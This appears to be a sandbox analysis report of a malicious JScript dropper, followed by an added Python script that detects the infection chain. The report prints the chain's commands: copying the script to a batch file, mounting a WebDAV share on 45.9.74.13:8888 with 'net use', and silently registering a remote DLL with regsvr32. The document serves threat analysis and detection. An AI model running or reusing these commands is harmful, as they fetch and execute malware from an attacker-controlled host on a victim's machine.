Windows Analysis Report
911966882735824909.js

Overview

General Information

Sample name: 911966882735824909.js
Analysis ID: 1467954
MD5: 8c191d66f4255e637dad88e4af68b8a4
SHA1: 511998d50a6780c570dd0c920ba1dfeae2d27a43
SHA256: 7d84dcf2dd227761c0eb67814538c2d2eb6de133e7ad1977e6756f76742c9084
Tags: js

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Gathers information about network shares
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Registers a DLL
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

AV Detection

Source: 911966882735824909.js Virustotal: Detection: 23%

Networking

Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 8888 (4 times)
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49731 (4 times)
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 45.9.74.13:8888
Source: Joe Sandbox View ASN Name: FIRST-SERVER-EU-ASRU FIRST-SERVER-EU-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.74.13 (17 times)
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden; Date: Fri, 05 Jul 2024 04:32:06 GMT; Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden; Date: Fri, 05 Jul 2024 04:32:09 GMT; Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden; Date: Fri, 05 Jul 2024 04:32:10 GMT; Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden; Date: Fri, 05 Jul 2024 04:32:10 GMT; Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden; Date: Fri, 05 Jul 2024 04:32:11 GMT; Content-Length: 0
Source: net.exe, 00000003.00000002.1701789155.000002A73BDD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.9.74.13:8888/
Source: net.exe, 00000003.00000002.1701789155.000002A73BDD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.9.74.13:8888/~

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: 911966882735824909.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal72.troj.spyw.evad.winJS@8/2@0/1
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\qtgsne.bat
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 911966882735824909.js Virustotal: Detection: 23%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll, cmdext.dll, apphelp.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll, wkscli.dll, netutils.dll, samcli.dll, srvcli.dll, iphlpapi.dll, drprov.dll, winsta.dll, ntlanman.dll, davclnt.dll, davhlpr.dll, winhttp.dll, ondemandconnroutehelper.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll, mswsock.dll, winnsi.dll, sspicli.dll, wininet.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, urlmon.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll, aclayers.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, uxtheme.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
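The process chain above (wscript.exe copying the .js to a .bat, net use against \\45.9.74.13@8888\DavWWWRoot\, regsvr32 /s loading 539.dll from that share) and the http://45.9.74.13:8888/ string in the Networking section are one fact seen twice: a host@port\DavWWWRoot UNC is how the Windows WebClient service spells a plain-HTTP WebDAV URL, so the DLL is fetched over HTTP on port 8888 while the command lines only ever show a share path. The Python below is an added example, not Joe Sandbox output or code. It translates such UNC paths to the URL the WebClient will actually request and runs three detection rules over process-creation records constructed from this report's command lines; the ProcEvent record layout, the "unknown" parent of wscript.exe and the benign control event are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# WebDAV UNC as understood by the Windows WebClient (Mini-Redirector):
#   \\host@port\DavWWWRoot\path  -> http://host:port/path
#   \\host@SSL\DavWWWRoot\path   -> https://host/path
WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[A-Za-z0-9.\-]+)(?P<ssl>@SSL)?(?:@(?P<port>\d{1,5}))?"
    r"\\DavWWWRoot(?P<path>\\[^\s\"]*)?",
    re.IGNORECASE,
)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.IGNORECASE)


@dataclass
class ProcEvent:            # assumed record layout (Sysmon EID 1 / 4688 style)
    parent_image: str
    image: str
    command_line: str


def webdav_unc_to_url(text: str) -> Optional[str]:
    """Return the HTTP(S) URL behind the first WebDAV UNC in text, else None."""
    m = WEBDAV_UNC.search(text)
    if not m:
        return None
    scheme = "https" if m.group("ssl") else "http"
    netloc = m.group("host") + (f":{m.group('port')}" if m.group("port") else "")
    path = (m.group("path") or "\\").replace("\\", "/")
    return f"{scheme}://{netloc}{path}"


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (rule, evidence) pairs for each stage of the chain seen in an event."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        image, parent = _basename(ev.image), _basename(ev.parent_image)
        cmd = ev.command_line
        low = cmd.lower()
        # Stage 1: script host spawns cmd.exe to copy the .js to a .bat and run
        # it (the sample is a JScript/batch polyglot).
        if (parent in SCRIPT_HOSTS and image == "cmd.exe"
                and "copy" in low and ".bat" in low and SCRIPT_EXT.search(cmd)):
            findings.append(("script_copied_to_bat", cmd))
        url = webdav_unc_to_url(cmd)
        # Stage 2: net use against \\host@port\DavWWWRoot is an HTTP fetch via WebDAV.
        if url and image == "net.exe" and low.lstrip().startswith("net use"):
            findings.append(("webdav_net_use", url))
        # Stage 3: regsvr32 registering a DLL straight from the WebDAV path.
        if url and image == "regsvr32.exe":
            findings.append(("regsvr32_remote_dll", url))
    return findings


def is_webdav_dropper_chain(findings: List[Tuple[str, str]]) -> bool:
    rules = {rule for rule, _ in findings}
    return {"script_copied_to_bat", "webdav_net_use", "regsvr32_remote_dll"} <= rules


# Constructed from the "Process created" lines of this report; the last event
# is a benign control (an ordinary SMB mapping) and is not from the report.
SAMPLE_EVENTS = [
    ProcEvent("unknown", "C:\\Windows\\System32\\wscript.exe",
              "C:\\Windows\\System32\\WScript.exe \"C:\\Users\\user\\Desktop\\911966882735824909.js\""),
    ProcEvent("C:\\Windows\\System32\\wscript.exe", "C:\\Windows\\System32\\cmd.exe",
              "\"C:\\Windows\\System32\\cmd.exe\" /k copy \"C:\\Users\\user\\Desktop\\911966882735824909.js\" "
              "\"C:\\Users\\user\\\\qtgsne.bat\" && \"C:\\Users\\user\\\\qtgsne.bat\""),
    ProcEvent("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\net.exe",
              "net use \\\\45.9.74.13@8888\\DavWWWRoot\\"),
    ProcEvent("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\regsvr32.exe",
              "regsvr32 /s \\\\45.9.74.13@8888\\DavWWWRoot\\539.dll"),
    ProcEvent("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\net.exe",
              "net use Z: \\\\fileserver.corp.example\\share"),
]

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule:24s} {evidence}")
    print("full chain:", is_webdav_dropper_chain(SAMPLE_EVENTS and detect(SAMPLE_EVENTS)))
```

Each rule on its own is noisy (net use and regsvr32 are everyday admin tools); the useful alert is the conjunction within one process tree, which is what is_webdav_dropper_chain checks. The URL translation is also what to hand to the proxy and firewall team, since the traffic never touches port 445.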

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IHost.ScriptFullName();IWshShell3.Run("cmd /k copy "C:\Users\user\Desktop\911966882735824909.js" "%userprofile%\", "0", "false")
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 8888 (4 times)
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49731 (4 times)
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 times)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\net.exe TID: 7380 Thread sleep time: -30000s >= -30000s
Source: net.exe, 00000003.00000002.1701789155.000002A73BD59000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1701789155.000002A73BDB9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\